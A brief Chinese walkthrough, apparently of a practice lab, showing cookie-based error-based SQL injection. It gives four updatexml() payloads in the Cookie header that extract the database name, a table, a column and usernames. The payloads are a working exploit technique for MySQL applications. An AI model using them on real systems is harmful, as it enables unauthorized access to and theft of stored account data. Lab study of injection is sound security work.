当正确输入后,页面回显cookie,猜测此注入点在cookie:
用burpsuite抓包,证明猜测:
爆库:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database())),0)#;
爆表:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema=database() limit 0,1)),0)#;
爆列:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (column_name) from information_schema.columns where table_name='users' limit 0,1)),0)#;
爆数据:
Cookie: uname=admin' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0)#;